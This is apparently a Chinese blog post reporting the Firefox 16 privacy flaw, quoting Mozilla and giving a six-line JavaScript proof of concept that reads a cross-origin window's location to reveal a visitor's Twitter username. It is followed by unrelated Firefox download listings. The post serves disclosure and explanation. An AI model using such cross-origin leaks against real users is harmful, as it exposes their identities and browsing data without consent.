`
ldb19890624
  • 浏览: 243607 次
  • 性别: Icon_minigender_1
  • 来自: 北京
文章分类
社区版块
存档分类
最新评论

Firefox 16隐私漏洞的攻击方法

 
阅读更多
火狐浏览器前几天发布了最新的Firefox 16正式版,但是在刚发布一天,就爆出了重大安全漏洞,接着Mozilla在官方首页上移除了Firefox 16的下载链接,转而继续提供Firefox 15.0.1版本。

Mozilla这样解释:“该漏洞可能允许恶意网站获取用户的访问记录,窃取URL或URL参数,不过目前还没有迹象表明这个漏洞已经被人利用。”

下面是利用该漏洞获取用户信息的攻击代码,很简单,只需6行:

function poc(){
	var win = window.open('https://twitter.com/lists/', 'newWin', 'width=200, height=200');
	setTimeout(function(){
		alert('Hello '+/^https:\/\/twitter.com\/([^/]+)/.exec(win.location)[1])
	}, 5000);
}

这个代码演示了使用Firefox 16的漏洞收集Twitter用户的用户名。当然,还可以干很多事!!!
分享到:
评论

相关推荐

    Firefox火狐浏览器官方Setup 45.0-win64版本exe安装包

    综上所述,Firefox火狐浏览器45.0-win64版本提供了一套全面的浏览解决方案,注重用户体验、隐私保护和安全性,结合其强大的扩展能力和自定义选项,成为众多用户的选择。通过下载并安装"Firefox Setup 45.0.exe"文件...

    Firefox火狐浏览器官方Setup 52.0.2-win64版本exe安装包

    《Firefox火狐浏览器52.0.2-win64版本安装详解》 Firefox火狐浏览器,作为一款全球知名的开源网络浏览器,以其强大的功能、高度的定制性和安全性深受用户喜爱。52.0.2-win64是Firefox针对Windows 64位系统的一个...

    Firefox火狐浏览器官方45.0.2-win32版本exe安装包

    《Firefox火狐浏览器45.0.2-win32版本详解》 Firefox,这款由Mozilla基金会开发的开源网络浏览器,自2004年首次亮相以来,就以其强大的功能、高度的可定制性和对用户隐私的重视赢得了全球用户的喜爱。在本文中,...

    Firefox 52.0.2 渗透便携版

    Firefox是一款开源的网络浏览器,以其高度可定制性、安全性和隐私保护而受到广大用户的喜爱。渗透测试是网络安全领域的一个重要环节,它涉及到对系统、应用程序或网络进行模拟攻击,以识别潜在的安全漏洞。Firefox ...

    Firefox火狐浏览器官方84.0-mac版本dmg安装包

    Firefox火狐浏览器是一款全球知名的开源网络浏览器,以其强大的安全性和高度的可定制性深受用户喜爱。84.0是该浏览器的一个稳定版本,为用户提供了一系列的改进和新特性。在这个mac版本的安装包中,我们关注的重点是...

    Firefox火狐浏览器官方72.0.2-win32版本exe安装包

    总之,Firefox火狐浏览器72.0.2-win32版本是针对Windows 32位系统的优化版本,它在速度、安全性和隐私保护方面都有着显著的提升。通过下载并安装"Firefox Setup 72.0.2.exe"文件,用户可以享受到一个更加安全、快速...

    Firefox火狐浏览器官方Setup 68.5.0esr-win64版本exe安装包

    Firefox火狐浏览器,由Mozilla基金会开发,是一款开源、免费的网络浏览器,以其强大的安全性、隐私保护和高度可定制性著称。本资源是Firefox 68.5.0esr-win64的安装包,专为64位Windows系统设计,提供了稳定且优化的...

    Firefox火狐浏览器官方52.8.0esr-win32版本exe安装包

    Firefox火狐浏览器,由Mozilla基金会开发,是一款开源、免费的网络浏览器,以其强大的安全性、隐私保护和高度可定制性著称。本资源是Firefox的52.8.0esr-win32版本,特别为Windows 32位操作系统设计。"esr"代表...

    Mozilla Firefox 火狐浏览器

    4. **安全性**:Firefox不断更新以应对新的网络安全威胁,它提供了内置的安全功能,如防止恶意软件和网络钓鱼攻击。此外,Firefox支持HTTPS加密协议,确保数据传输的安全性。 5. **开源**:作为开源软件,Firefox的...

    firefox 59 

    在安全性方面,Firefox 59修复了多个安全漏洞,以保护用户免受潜在的攻击。这些补丁是Mozilla定期发布的,以确保浏览器的稳定性和安全性。 在用户界面方面,Firefox 59引入了改进的多窗口管理,使用户更容易在打开...

    Firefox火狐浏览器官方72.0.2-win32版本msi安装包

    《Firefox火狐浏览器72.0.2-win32版本msi安装包详解》 Firefox火狐浏览器,作为全球知名的开源网页浏览器,以其强大的安全性能、丰富的扩展插件以及高度的自定义性深受用户喜爱。72.0.2-win32版本是针对Windows 32...

    Firefox火狐浏览器官方84.0.2-mac版本dmg安装包

    Firefox火狐浏览器是一款深受用户喜爱的开源网络浏览器,以其强大的安全性、灵活性和可定制性而闻名。84.0.2是该浏览器的一个特定版本,适用于Mac操作系统。这个版本的安装包采用.dmg格式,是苹果Mac OS X系统中常用...

    Firefox火狐浏览器官方84.0b8-win32版本msi安装包

    Firefox火狐浏览器,作为全球最受欢迎的开源网络浏览器之一,一直以来都以其强大的安全性、隐私保护和可定制性备受用户喜爱。本篇文章将详细解析“Firefox火狐浏览器官方84.0b8-win32版本msi安装包”,帮助用户更好...

    Firefox火狐浏览器官方52.8.1esr-win32版本exe安装包

    Firefox火狐浏览器,由Mozilla基金会开发,是一款开源、免费的网络浏览器,以其强大的安全性、隐私保护和高度可定制性著称。本篇文章将深入探讨52.8.1esr-win32版本的特性、安装流程以及其在Windows 32位系统中的...

    Firefox火狐浏览器官方Setup 68.9.0esr-win64版本exe安装包

    《Firefox火狐浏览器68.9.0esr-win64版本详解》 Firefox火狐浏览器,由Mozilla基金会开发,是一款全球广泛使用的开源网络浏览器。它以其强大的安全性能、高度的自定义化以及对Web标准的出色支持而备受赞誉。在本文...

    Firefox火狐浏览器官方Setup 60.2.2esr-win64版本exe安装包

    Firefox火狐浏览器,由Mozilla基金会开发,是一款开源、免费的网络浏览器,以其强大的安全性、隐私保护和高度可定制性著称。本资源提供的“Firefox火狐浏览器官方Setup 60.2.2esr-win64版本exe安装包”,是专为64位...

    Firefox火狐浏览器官方Setup 52.3.0esr-win64版本exe安装包

    Firefox火狐浏览器,由Mozilla基金会开发,是一款开源、免费的网络浏览器,以其强大的安全性、隐私保护和高度可定制性著称。本资源是Firefox 52.3.0esr-win64的官方安装包,专为64位Windows操作系统设计,提供了稳定...

    Firefox火狐浏览器官方50.0.2-win32版本exe在线安装包

    《Firefox火狐浏览器50.0.2-win32版本:深入解析与使用指南》 Firefox火狐浏览器,由Mozilla基金会开发,是一款全球知名的开源网络浏览器。本文将围绕"Firefox火狐浏览器官方50.0.2-win32版本exe在线安装包"这一...

    Firefox火狐浏览器官方85.0b8-mac版本pkg安装包

    Firefox火狐浏览器是一款全球知名的开源网络浏览器,以其强大的安全性和高度的可定制性深受用户喜爱。85.0b8是Firefox的一个版本号,其中“b8”代表这是一个测试版(Beta),意味着它在正式发布前供用户试用并提供...

    Firefox 46.0 渗透便携版

    【Firefox 46.0 渗透便携版】是一个专为网络安全专业人士和爱好者设计的定制版火狐浏览器。这个版本不仅提供了标准的浏览功能,更集成了一系列与网络安全相关的插件,使得用户在进行安全测试和学习时可以更加高效、...

Global site tag (gtag.js) - Google Analytics